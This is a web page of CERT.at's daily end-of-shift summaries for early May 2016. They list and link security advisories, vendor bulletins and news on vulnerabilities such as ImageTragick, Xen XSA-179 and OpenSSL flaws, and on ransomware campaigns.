- Daily - CERT.at

Tageszusammenfassung - Dienstag 10-05-2016
by Daily end-of-shift report 10 May '16

10 May '16

======================= = End-of-Shift report = ======================= Timeframe: Montag 09-05-2016 18:00 − Dienstag 10-05-2016 18:00 Handler: Stephan Richter Co-Handler: Alexander Riepl *** [Xen-announce] Xen Security Advisory 179 (CVE-2016-3710, CVE-2016-3712) - QEMU: Banked access to VGA memory (VBE) uses inconsistent bounds checks *** --------------------------------------------- Qemu VGA module allows banked access to video memory using the window at 0xa00000 and it supports different access modes with different address calculations. But an attacker can easily change access modes after setting the bank .. --------------------------------------------- http://lists.xen.org/archives/html/xen-announce/2016-05/msg00001.html *** Finding Conditional SEO Spam in Drupal *** --------------------------------------------- Nobody likes spam. It's never fun (unless you're watching Monty Python). For us it comes with the territory; removing SEO spam has been at the core of .. --------------------------------------------- https://blog.sucuri.net/2016/05/seo-spam-in-drupal-database.html *** DSA-3572 websvn - security update *** --------------------------------------------- Nitin Venkatesh discovered that websvn, a web viewer for Subversion repositories, is susceptible to cross-site scripting attacks viaspecially crafted file and directory names in repositories. --------------------------------------------- https://www.debian.org/security/2016/dsa-3572 *** Gamarue, Nemucod, and JavaScript *** --------------------------------------------- JavaScript is now being used largely to download malware because it's easy to obfuscate the code and it has a small size. Most recently, one of the most predominant JavaScript malware that has been spreading other malware is Nemucod. This .. --------------------------------------------- https://blogs.technet.microsoft.com/mmpc/2016/05/09/gamarue-nemucod-and-jav… *** Don�t Put Off Till Tomorrow What You Should Start Today (Part 1) *** --------------------------------------------- For some, the upcoming EU legislative changes (the General Data Protection Regulation, referred to as GDPR, and the Network and Information Security Directive, referred to as the NIS Directive) may have seemed like they .. --------------------------------------------- http://researchcenter.paloaltonetworks.com/2016/05/cso-dont-put-off-till-to… *** Performing network forensics with Dshell. Part 1: Basic usage, (Mon, May 9th) *** --------------------------------------------- I found out recently there is a very interesting tool that enables some interesting capabilities to perform network forensics from a PCAP capture file. It"> in the command prompt. There is a major keyword that launches .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=21035 *** This is what a root debug backdoor in the Linux kernel looks like *** --------------------------------------------- Allwinners all-loser code makes it into shipped firmware A root backdoor for debugging Android gadgets managed to end up in shipped firmware - and were surprised this sort of colossal blunder doesnt happen more often. --------------------------------------------- www.theregister.co.uk/2016/05/09/allwinners_allloser_custom_kernel_has_a_na… *** DSA-3573 qemu - security update *** --------------------------------------------- https://www.debian.org/security/2016/dsa-3573 *** SS7 spookery on the cheap allows hackers to impersonate mobile chat subscribers *** --------------------------------------------- Flaws in the mobile signalling protocols can be abused to read messaging apps such as WhatsApp and Telegram. --------------------------------------------- www.theregister.co.uk/2016/05/10/ss7_mobile_chat_hack/ *** Security Advisory: ImageMagick vulnerability CVE-2016-3714 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/03/sol03151140.html *** Let's stop talking password flaws and instead discuss access management *** --------------------------------------------- A good bit of attention has been given to a new report that suggests that there are organizations that don't change their administrative passwords at all, ever. While it may be a bit eye opening that many IT professionals said they did not .. --------------------------------------------- https://www.helpnetsecurity.com/2016/05/10/password-flaws-access-management/ *** xt:Commerce: Dringende Patches ohne Details *** --------------------------------------------- Der Anbieter des Online-Shop-Systems xt:Commerce verteilt aktuell einen Sicherheitspatch. Betroffene Admins sollten die abgesicherten Versionen mit "sehr hoher .. --------------------------------------------- http://heise.de/-3200152 *** Hacker Challenges *** --------------------------------------------- Want to get started hacking things but don't want to do anything illegal? Here are some challenges others have made to help you practice some hacking skills. By participating in the challenges you could learn the following .. --------------------------------------------- https://www.tunnelsup.com/hacker-challenges/ *** Ransomware Is Not a 'Malware Problem' - It's a Criminal Business Model *** --------------------------------------------- Today Unit 42 published our latest paper on ransomware, which has quickly become one of the greatest cyberthreats facing organizations around the world. As a business model, ransomware has proven to be highly effective .. --------------------------------------------- http://researchcenter.paloaltonetworks.com/2016/05/unit-42-ransomware-trend… *** Lateral Movement: Do You Have Enough Eyes? *** --------------------------------------------- Sophisticated attackers can find their way into a corporate network in many ways. An attack could come from an external source, through the exploitation of a service, or by being brought in by a user whose laptop has been infected while .. --------------------------------------------- http://resources.infosecinstitute.com/lateral-movement-do-you-have-enough-e… *** Böse Bilder: Akute Angriffe auf Webseiten über ImageMagick *** --------------------------------------------- Die Gnadenfrist ist abgelaufen. Wer ein ungepatchtes ImageMagick auf seinem Server einsetzt, sollte schnellstens handeln, denn nun sind Exploits im Umlauf. --------------------------------------------- http://heise.de/-3200773 *** Xen Security Advisory CVE-2016-3710,CVE-2016-3712 / XSA-179 *** --------------------------------------------- http://xenbits.xen.org/xsa/advisory-179.txt *** IBM Security Bulletin: Vulnerabilities in OpenSource PHP Affect IBM Lotus Protector For Mail Security (CVE-2016-3142 ) *** --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg21981983 *** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM SmartCloud Provisioning for IBM Software Virtual Appliance *** --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg2C1000128 *** Hackers paradise: Outdated Internet Explorer, Flash installs in enterprises *** --------------------------------------------- Two in five Flash users DO update. Surprised? A quarter of all Windows devices are running outdated and unsupported versions of Internet Explorer, exposing users to more .. --------------------------------------------- www.theregister.co.uk/2016/05/10/ie_flash_vulns_rife/

1 0

Tageszusammenfassung - Montag 9-05-2016
by Daily end-of-shift report 09 May '16

09 May '16

======================= = End-of-Shift report = ======================= Timeframe: Freitag 06-05-2016 18:00 − Montag 09-05-2016 18:00 Handler: Robert Waldner Co-Handler: n/a *** Symantec Endpoint Encryption Unquoted Service Path Local Elevation of Privilege *** --------------------------------------------- CVSS2 Base Score: 6.8 Symantec Endpoint Encryption (SEE) has an unquoted search path in EEDService. This could provide a non-privileged local user the ability to successfully insert arbitrary code in the root path. --------------------------------------------- http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se… *** WordPress 4.5.2 Security Release *** --------------------------------------------- WordPress 4.5.2 is now available. This is a security release for all previous versions and we strongly encourage you to update your sites immediately. WordPress versions 4.5.1 and earlier are affected by a SOME vulnerability through Plupload, the third-party library WordPress uses for uploading files. WordPress versions 4.2 through 4.5.1 are vulnerable to reflected XSS using specially crafted URIs through MediaElement.js, the third-party library used for media players. MediaElement.js and Plupload have also released updates fixing these issues. --------------------------------------------- https://wordpress.org/news/2016/05/wordpress-4-5-2/ *** Lenovo Patches Serious Flaw In Pre-Installed Support Tool *** --------------------------------------------- Reader itwbennett writes: Lenovo has made available a patch for the vulnerability in its Lenovo Solution Center, a support tool which comes pre-installed on many Lenovo laptops and desktops. The vulnerability could allow attackers to execute code with system privileges and take over computers. Users should automatically be prompted to update LSC when they open the application, but in case they arent, they should download the latest version (3.3.002) manually from Lenovos website. --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/8xQvMt43Nw8/lenovo-patches-… *** The massive password breach that wasn't: Google says data is 98% 'bogus' *** --------------------------------------------- When a script kiddie sells 272 million accounts for $1, be very, very skeptical. --------------------------------------------- http://arstechnica.com/security/2016/05/the-massive-password-breach-that-wa… *** Security Advisory: OpenSSL vulnerability CVE-2016-2109 *** --------------------------------------------- The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in the ASN.1 BIO implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (memory consumption) via a short invalid encoding. --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/23/sol23230229.html?… *** Analyzing ImageTragick Exploits in the Wild *** --------------------------------------------- Three days ago the ImageMagic (ImageTragick) vulnerability was released to the world. We've been actively monitoring as promised, and have started to see a few different attacks targeting the vulnerability. Interestingly enough, the attacks themselves seem to be targeted against specific customers and not mass blanket attacks, which is what you'd expect ... --------------------------------------------- https://blog.sucuri.net/2016/05/analyzing-imagetragick-exploits-in-the-wild… *** "Detecting the Siemens S7 Worm and Similar Capabilities" *** --------------------------------------------- An article came out on May 5th titled "Daisy-chained research spells malware worm hell for power plants and other utilities" with the subtitle of "Worlds first PLC worm spreads like cancer". Having been on the receiving end of sensationalized headlines before I empathize with the authors of the research... --------------------------------------------- http://ics.sans.org/blog/2016/05/08/detecting-the-siemens-s7-worm-and-simil… *** World Password Day--Dont be an easy target *** --------------------------------------------- Thursday, May 5th, marks the 'celebration' of the fourth annual World Password Day. .. * Have you updated the passwords on all of your accounts within the last three months? * Have you enabled two-factor authentication on accounts that allow it? *Are you using the strongest possible combinations of numbers, letters and symbols allowed by the site? *Are you using different passwords for every account (no duplicates or very similar variations)? --------------------------------------------- http://community.hpe.com/t5/Protect-Your-Assets/World-Password-Day-Don-t-be… *** AlphaLocker Is the Most Professional Ransomware Kit to Date ... but security researchers already cracked it *** --------------------------------------------- Luckily for us, other security experts have already cracked its secrets over the past weekend, and a decrypter was published that helps any of the infected victims recover their files for free, without paying the ransom. Nevertheless, heres a small intro into how crooks are creating, advertising, and then selling ransomware on the underground market. --------------------------------------------- http://news.softpedia.com/news/alphalocker-is-the-most-professional-ransomw… *** ImageMagick Vulnerability Information *** --------------------------------------------- A few days ago an ImageMagick vulnerability was disclosed dubbed 'ImageTragick' that affects WordPress websites whose host has ImageMagick installed. If you control your own hosting for your WordPress site, you should look to implement the following fix(es) immediately. --------------------------------------------- https://make.wordpress.org/core/2016/05/06/imagemagick-vulnerability-inform… *** Wordpress-Plugin bleibt ungefixt *** --------------------------------------------- Ein Sicherheitsforscher deckte zwei Lücken in der Wordpress-Erweiterung Event-Registration auf; die Hersteller reagieren jedoch nicht. --------------------------------------------- http://heise.de/-3198956 *** Penetration Testing of a Citrix Server *** --------------------------------------------- Here I'll discuss how I did a pentest of a Citrix server in a lab network. First, let us understand about Windows terminal service. Microsoft Windows Terminal Services, otherwise known as Remote Desktop Services, is one of the components of Windows 2003-08 Server, which allows multiple sessions to run the application over it. --------------------------------------------- http://resources.infosecinstitute.com/penetration-testing-of-a-citrix-serve… *** Security Advisory - XSS Vulnerability in the Email App of Huawei Smartphone *** --------------------------------------------- There is a vulnerability due to the lack of output encoding for some particular characters in the email APP built in the affected Smart Phones. A successful exploitation of the vulnerability could allow an unauthenticated remote attacker to perform a cross-site scripting (XSS) attack and lead to obtain the user information. --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2016/huawei-sa-20160507-… *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: The vulnerability in IBM Java SDK affect IBM Tivoli Composite Application Manager for Transactions(CVE-2016-0363 and CVE-2016-0376) *** http://www.ibm.com/support/docview.wss?uid=swg21982634 --------------------------------------------- *** IBM Security Bulletin: Security Bulletin: Vulnerability in OpenSSL affects IBM InfoSphere Master Data Management (CVE-2016-2842) *** http://www.ibm.com/support/docview.wss?uid=swg21982353 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilitiy in OpenSSL affect IBM Storwize V7000 Unified - CVE-2016-0800 *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005717 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM SONAS - CVE-2016-0800 *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005716 --------------------------------------------- *** IBM Security Bulletin: Apache Tomcat vulnerability affects IBM SONAS (CVE-2015-5345) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005712 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in InstallShield affects IBM Tivoli Storage Manager HSM for Windows (CVE-2016-2542) *** http://www.ibm.com/support/docview.wss?uid=swg21982741 --------------------------------------------- *** IBM Security Bulletin: IBM Forms Viewer Installation could allow a remote attacker to execute arbitrary code on the system (CVE-2016-2542) *** http://www.ibm.com/support/docview.wss?uid=swg21982440 --------------------------------------------- *** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM SONAS (CVE-2015-7547) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005681 --------------------------------------------- *** IBM Security Bulletin: Potential vulnerabilities in IBM OpenPages GRC Platform with Database *** http://www.ibm.com/support/docview.wss?uid=swg21982461 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in TLS affects IBM SONAS (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005722 --------------------------------------------- *** IBM Security Bulletin: Samba vulnerability issues on IBM SONAS (CVE-2015-5252, CVE-2015-5296, and CVE-2015-5299) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005693 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in Apache Cordova Android may affect IBM WebSphere Portal (CVE-2015-5256) *** http://www.ibm.com/support/knowledgecenter/SSHRKX_8.5.0/mp/integrate/wl_int… --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM SONAS (CVE-2015-1794, CVE-2015-3194, CVE-2015-3195, and CVE-2015-3196) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005694 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in GSKit affect Tivoli Workload Scheduler (CVE-2015-7421, CVE-2015-7420) *** http://www.ibm.com/support/docview.wss?uid=swg21982432 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Liberty for Java for IBM Bluemix April 2016 CPU (CVE-2016-3426, CVE-2016-3427) *** http://www.ibm.com/support/docview.wss?uid=swg21982850 ---------------------------------------------

1 0

Tageszusammenfassung - Freitag 6-05-2016
by Daily end-of-shift report 06 May '16

06 May '16

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 04-05-2016 18:00 − Freitag 06-05-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Microsoft to retire support for SHA1 certificates in the next 4 months *** --------------------------------------------- The lock icon will be gone by summer; sites using SHA1 to be blocked come January. --------------------------------------------- http://arstechnica.com/security/2016/05/microsoft-to-retire-support-for-sha… *** Österreich auf der Suche nach Nachwuchs-Hackern *** --------------------------------------------- Bei der Cyber Security Challenge 2016 werden vom Abwehramt und dem Verein Cyber Security Austria zum fünften Mal junge Hacker-Talente gesucht. --------------------------------------------- http://futurezone.at/digital-life/oesterreich-auf-der-suche-nach-nachwuchs-… *** ImageTragick: Another Vulnerability, Another Nickname, (Thu, May 5th) *** --------------------------------------------- Introduction On Tuesday 2016-05-03, we started seeing reports about a vulnerability for a cross-platform suite named ImageMagick [1, 2, 3]. This new vulnerability has been nicknamed ImageTragick and has its own website. Apparently, the vulnerability will be assigned to CVE-2016-3714. It wasnt yet on mitre.orgs CVE site when I wrote this diary. Johannes Ullrich already discussed this vulnerability in yesterdays ISC StormCast for 2016-05-04, but theres been more press about it. Should... --------------------------------------------- https://isc.sans.edu/diary.html?storyid=21023&rss *** Jaku botnet hides targeted attacks within generic botnet noise *** --------------------------------------------- Botnets are usually created by cyber criminals that use them to launch DDoS attacks, deliver spam, effect click fraud. The recently discovered Jaku botnet can effectively do all those things, if its botmaster(s) choose to do so, but it seems that they have other things in mind. The botnet which, according to Forcepoint researchers, numbered as many as 17,000 victims at different points in time, consists of several botnets "answering to" different C&C servers. The... --------------------------------------------- https://www.helpnetsecurity.com/2016/05/05/jaku-botnet-targeted-attacks/ *** Juniper patches OpenSSHs roaming bug in Junos OS *** --------------------------------------------- Screen OS not affected The next vendor to kill off the OpenSSH roaming bug announced in January is Juniper Networks. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/05/05/juniper_pat… *** Criminals Peddling Affordable AlphaLocker Ransomware *** --------------------------------------------- A relatively affordable and difficult to detect ransomware-as-a-service named AlphaLocker has begun making the rounds, researchers warn. --------------------------------------------- http://threatpost.com/criminals-peddling-affordable-alphalocker-ransomware/… *** Microsoft BITS Used to Download Payloads, (Thu, May 5th) *** --------------------------------------------- A few day ago,I found an interesting malicious Word document. First of all, the file has a very low score on VT:2/56 (analysis is available here). The document is a classic one:Once opened, it asks the victim to enable macro execution if not yet enabled. The document targets" />">">The OLE document contains"> $ oledump.py b2a9d203bb135b54319a9e5cafc43824 1: 113 \x01CompObj 2: 4096 \x05DocumentSummaryInformation 3: 4096 \x05SummaryInformation 4: 9398 1Table 5: --------------------------------------------- https://isc.sans.edu/diary.html?storyid=21027&rss *** On The Monetization Of Crypto-Ransomware *** --------------------------------------------- Over the last few years, technologies and infrastructure, in the form of crypto-currencies, the dark web and well-organized criminal affiliate programs have aligned to create the perfect storm. And from that storm, the crypto-ransomware beast has arisen. There's a reason why crypto-ransomware is making the news almost daily - it's unique compared to every other... --------------------------------------------- https://labsblog.f-secure.com/2016/05/06/on-the-monetization-of-crypto-rans… *** Studie: TLS-Proxies bringen Sicherheitsprobleme *** --------------------------------------------- Unter 14 Antivirus- und Kinderschutzprodukten, die Inhalte in gesicherten TLS-Verbindungen filtern, fand sich kein einziges, das dabei keine zusätzlichen Sicherheitsprobleme verursachte. --------------------------------------------- http://heise.de/-3197932 *** Qualcomm flaw puts millions of Android devices at risk *** --------------------------------------------- A vulnerability in an Android component shipped with phones that use Qualcomm chips puts users text messages and call history at risk of theft.The flaw was found by security researchers from FireEye and was patched by Qualcomm in March. However, because the vulnerability was introduced five years ago, many affected devices are unlikely to ever receive the fix because theyre no longer supported by their manufacturers.The vulnerability, which is tracked as CVE-2016-2060, is located on an Android... --------------------------------------------- http://www.cio.com/article/3066827/qualcomm-flaw-puts-millions-of-android-d… *** Security Alert: New Ransomware Promises to Donate Earnings to Charity *** --------------------------------------------- Psychological manipulation is heavily used in cyber attacks, especially in phishing and ransomware compromise attempts. As with all online scams, the attackers' main objective is simple: to make as much money and steal as much data as possible. So, in their malicious pursuit, they'll come up with new tactics to force their victims into complying with their conditions. Encrypting ransomware, such as CryptoWall or TeslaCrypt, is proof. --------------------------------------------- https://heimdalsecurity.com/blog/security-alert-new-ransomware-donate-earni… *** New Security Flaw Found in Lenovo Solution Center Software *** --------------------------------------------- Security researchers at Trustwave SpiderLabs have discovered a new vulnerability in Lenovo's much maligned Lenovo Solution Center software. The vulnerability allows attackers with local network access to a PC to execute arbitrary code. --------------------------------------------- http://threatpost.com/new-security-flaw-found-in-lenovo-solution-center-sof… *** Public Key Infrastructure (PKI) *** --------------------------------------------- Executive Summary This article is a detailed theoretical and hands-on with Public Key Infrastructure (PKI) and OpenSSL based Certificate Authority. In the first section, PKI and its associated concepts will be discussed. A test bed or lab environment on Ubuntu 14 will be prepared to apply PKI knowledge. Generation of CA, server and user keys/certificates... --------------------------------------------- http://resources.infosecinstitute.com/public-key-infrastructure-pki-2/ *** Upcoming Security Updates for Adobe Acrobat and Reader (APSB16-14) *** --------------------------------------------- A prenotification Security Advisory (APSB16-14) has been posted regarding upcoming releases for Adobe Acrobat and Reader scheduled for Tuesday, May 10, 2016. We will continue to provide updates on the upcoming releases via the Security Advisory as well as the... --------------------------------------------- https://blogs.adobe.com/psirt/?p=1344 *** Squid HTTP caching proxy Multiple Vulns *** --------------------------------------------- https://cxsecurity.com/issue/WLB-2016050024 *** [R1] PHP < 5.6.21 Vulnerabilities Affect Tenable SecurityCenter *** --------------------------------------------- http://www.tenable.com/security/tns-2016-09 *** HPE Network Node Manager i Multiple Flaws Let Remote Users Bypass Authentication, Obtain Data and Potentially Sensitive Information, and Conduct Cross-Site Scripting Attacks *** --------------------------------------------- http://www.securitytracker.com/id/1035767 *** Bugtraq: ESA-2016-051: Patch 14 for RSA Authentication Manager 8.1 SP1 to Address Multiple Vulnerabilities *** --------------------------------------------- http://www.securityfocus.com/archive/1/538287 *** DSA-3567 libpam-sshauth - security update *** --------------------------------------------- It was discovered that libpam-sshauth, a PAM module to authenticateusing an SSH server, does not correctly handle system users. In certainconfigurations an attacker can take advantage of this flaw to gain rootprivileges. --------------------------------------------- https://www.debian.org/security/2016/dsa-3567 *** USN-2963-1: OpenJDK 8 vulnerabilities *** --------------------------------------------- Ubuntu Security Notice USN-2963-14th May, 2016openjdk-8 vulnerabilitiesA security issue affects these releases of Ubuntu and its derivatives: Ubuntu 16.04 LTSSummarySeveral security issues were fixed in OpenJDK 8.Software description openjdk-8 - Open Source Java implementation DetailsMultiple vulnerabilities were discovered in the OpenJDK JRE related toinformation disclosure, data integrity, and availability. An attackercould exploit these to cause a denial of service, expose sensitive... --------------------------------------------- http://www.ubuntu.com/usn/usn-2963-1/ *** USN-2964-1: OpenJDK 7 vulnerabilities *** --------------------------------------------- Ubuntu Security Notice USN-2964-14th May, 2016openjdk-7 vulnerabilitiesA security issue affects these releases of Ubuntu and its derivatives: Ubuntu 15.10 Ubuntu 14.04 LTSSummarySeveral security issues were fixed in OpenJDK 7.Software description openjdk-7 - Open Source Java implementation DetailsMultiple vulnerabilities were discovered in the OpenJDK JRE related to informationdisclosure, data integrity, and availability. An attacker could exploitthese to cause a denial of service, expose... --------------------------------------------- http://www.ubuntu.com/usn/usn-2964-1/ *** Cisco security Advisories *** --------------------------------------------- *** Cisco Adaptive Security Appliance with FirePOWER Services Kernel Logging Denial of Service Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco FirePOWER System Software Packet Processing Denial of Service Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco TelePresence XML Application Programming Interface Authentication Bypass Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco Finesse HTTP Request Processing Server-Side Request Forgery Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Multiple Vulnerabilities in OpenSSL Affecting Cisco Products: May 2016 *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in bind affect Power Hardware Management Console (CVE-2016-1285, CVE-2016-1286) *** http://www.ibm.com/support/docview.wss?uid=nas8N1021266 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in ntp affect Power Hardware Management Console (CVE-2015-5300, CVE-2015-7704, CVE-2015-8138) *** http://www.ibm.com/support/docview.wss?uid=nas8N1021264 --------------------------------------------- *** IBM Security Bulletin: GNU C library (glibc) vulnerability affects IBM XIV Storage System (CVE-2015-7547) *** http://www.ibm.com/support/docview.wss?uid=ssg1S1005699 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Rational Performance Tester (CVE-2015-7575, CVE-2016-0475) *** http://www.ibm.com/support/docview.wss?uid=swg21982445 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Rational Service Tester (CVE-2015-7575, CVE-2016-0475) *** http://www.ibm.com/support/docview.wss?uid=swg21982446 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Rational Insight (CVE-2015-4872, CVE-2015-4893, CVE-2015-4803, CVE-2015-5006, CVE-2016-0483, CVE-2015-7575, CVE-2016-0448, CVE-2016-0466) *** http://www.ibm.com/support/docview.wss?uid=swg21972468 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Rational Reporting for Development Intelligence (CVE-2015-4872, CVE-2015-4893, CVE-2015-4803, CVE-2015-5006, CVE-2016-0483, CVE-2015-7575, CVE-2016-0448, CVE-2016-0466) *** http://www.ibm.com/support/docview.wss?uid=swg21972469 --------------------------------------------- *** IBM Security Bulletin: IBM Cognos Business Intelligence Server 2016Q1 Security Updater : IBM Cognos Business Intelligence Server is affected by multiple vulnerabilities. *** http://www.ibm.com/support/docview.wss?uid=swg21979767 --------------------------------------------- *** IBM Security Bulletin: Open Source Apache Tomcat vulnerabilities affect IBM Tivoli Application Dependency Discovery Manager (TADDM) February 2016 *** http://www.ibm.com/support/docview.wss?uid=swg21980693 --------------------------------------------- *** IBM Security Bulletin: Current Releases of IBM SDK for Node.js in IBM Bluemix are affected by CVE-2016-3956, CVE-2016-2515 and CVE-2016-2537. *** http://www.ibm.com/support/docview.wss?uid=swg21981433 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in InstallShield affects IBM Tivoli Storage Manager for Databases: Data Protection for Microsoft SQL Server (CVE-2016-2542) *** http://www.ibm.com/support/docview.wss?uid=swg21982467 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in InstallShield affects IBM Tivoli Storage FlashCopy Manager on Windows (CVE-2016-2542) *** http://www.ibm.com/support/docview.wss?uid=swg21982448 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in SQLite affects IBM Security Access Manager for Mobile (CVE-2015-3416) *** http://www.ibm.com/support/docview.wss?uid=swg21981269 --------------------------------------------- *** IBM Security Bulletin: IBM SPSS Statistics ActiveX Control Buffer Overflow (CVE-2015-8530) *** http://www.ibm.com/support/docview.wss?uid=swg21982035 --------------------------------------------- *** IBM Security Bulletin: The GPFS pattern provided with IBM PureApplication System is affected by a security vulnerability. (CVE-2015-7403) *** http://www.ibm.com/support/docview.wss?uid=swg21982660 ---------------------------------------------

1 0

Tageszusammenfassung - Mittwoch 4-05-2016
by Daily end-of-shift report 04 May '16

04 May '16

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 03-05-2016 18:00 − Mittwoch 04-05-2016 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Dev using Libarchive? Patch and push *** --------------------------------------------- Input validation bug opens code execution vuln The popular Libarchive open source compression library needs an update to cover a code execution vulnerability. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/05/04/dev_using_l… *** Sicherheitsupdates: PHP anfällig für Remote Code Execution *** --------------------------------------------- Angreifer können verschiedenen PHP-Versionen aus der Ferne Schadcode unterjubeln. Drei abgesicherte Versionen schließen zwei Sicherheitslücken. --------------------------------------------- http://heise.de/-3196826 *** Neue Versionen von Apache Struts wehren sich gegen Schad-Code *** --------------------------------------------- Über eine Sicherheitslücke können Angreifer Server mit Apache Struts unter Umständen aus der Ferne attackieren und Code ausführen. --------------------------------------------- http://heise.de/-3196868 *** Petya: the two-in-one trojan *** --------------------------------------------- Petya Trojan is an unusual hybrid of an MBR blocker and data encryptor: it prevents not only the operating system from booting but also blocks normal access to files located on the hard drives of the attacked system. --------------------------------------------- http://securelist.com/blog/research/74609/petya-the-two-in-one-trojan/ *** Höflicher Erpressungstrojaner entschuldigt sich und bittet um Geschenke *** --------------------------------------------- Ein neuer Krypto-Trojaner geht um: Die Alpha Ransomware verlangt iTunes-Gutscheine vom Opfer, sonst bleiben die Daten mit AES-256 verschlüsselt. Der Erpresserbrief ist überraschend höflich, verschweigt allerdings wichtige Details. --------------------------------------------- http://heise.de/-3197135 *** Yet Another Padding Oracle in OpenSSL CBC Ciphersuites *** --------------------------------------------- Yesterday a new vulnerability has been announced in OpenSSL/LibreSSL. A padding oracle in CBC mode decryption, to be precise. Just like Lucky13. Actually, it's in the code that fixes Lucky13.It was found by Juraj Somorovsky using a tool he developed called TLS-Attacker. Like in the "old days"... --------------------------------------------- https://blog.cloudflare.com/yet-another-padding-oracle-in-openssl-cbc-ciphe… *** Neutrino exploit kit sends Cerber ransomware, (Wed, May 4th) *** --------------------------------------------- Introduction Seems like were always finding new ransomware. In early March 2016, BleepingComputer announced a new ransomware named Cerber had appeared near the end of February [1]. A few days later, the Malwarebytes blog provided further analysis and more details on subsequent Cerber samples [2]. Cerber is distributed through exploit kits (EKs) and malicious spam (malspam). Ive only seen .rtf attachments that download and install Cerber if opened in Microsoft Word [3]." /> Shown above:... --------------------------------------------- https://isc.sans.edu/diary.html?storyid=21017 *** Security Advisory: Stored XSS in bbPress *** --------------------------------------------- Exploitation Level: Easy/Remote DREAD Score: 6/10 Vulnerability: Stored XSS Patched Version: bbPress 2.5.9 During regular research audits of our Sucuri Firewall, we discovered a Stored XSS vulnerability affecting the bbPress plugin for WordPress which is currently installed on 300,000 live websites - one of them being the popular wordpress.org support forum. Vulnerability Disclosure Timeline: April... --------------------------------------------- https://blog.sucuri.net/2016/05/security-advisory-stored-xss-bbpress-2.html *** Xcode 7.3.1 *** --------------------------------------------- Available for: OS X El Capitan v10.11 and later Impact: A remote attacker may be able to execute arbitrary code --------------------------------------------- https://support.apple.com/kb/HT206338 *** Cisco Prime Collaboration Assurance Open Redirect Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** F5 Security Advisory: Multiple OpenSSL vulnerabilities CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109, CVE-2016-2176 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/07/sol07538415.html?… *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect WebSphere Application Server April 2016 CPU (CVE-2016-3426, CVE-2016-3427) *** http://www.ibm.com/support/docview.wss?uid=swg21982223 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Sterling Connect:Direct for UNIX (CVE-2016-0799, CVE-2016-0702). *** http://www.ibm.com/support/docview.wss?uid=swg21981764 --------------------------------------------- *** IBM Security Bulletin: Potential vulnerabilities in IBM OpenPages GRC Platform with Application Server *** http://www.ibm.com/support/docview.wss?uid=swg21982462 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Cognos Metrics Manager (CVE-2016-0448, CVE-2016-0466) *** http://www.ibm.com/support/docview.wss?uid=swg21977134 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in current releases of the IBM SDK, Java Technology Edition affect IBM Tivoli Network Manager IP Edition *** http://www.ibm.com/support/docview.wss?uid=swg21975424 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM InfoSphere Information Server installer could expose sensitive information (CVE-2015-7493) *** http://www.ibm.com/support/docview.wss?uid=swg21982034 --------------------------------------------- 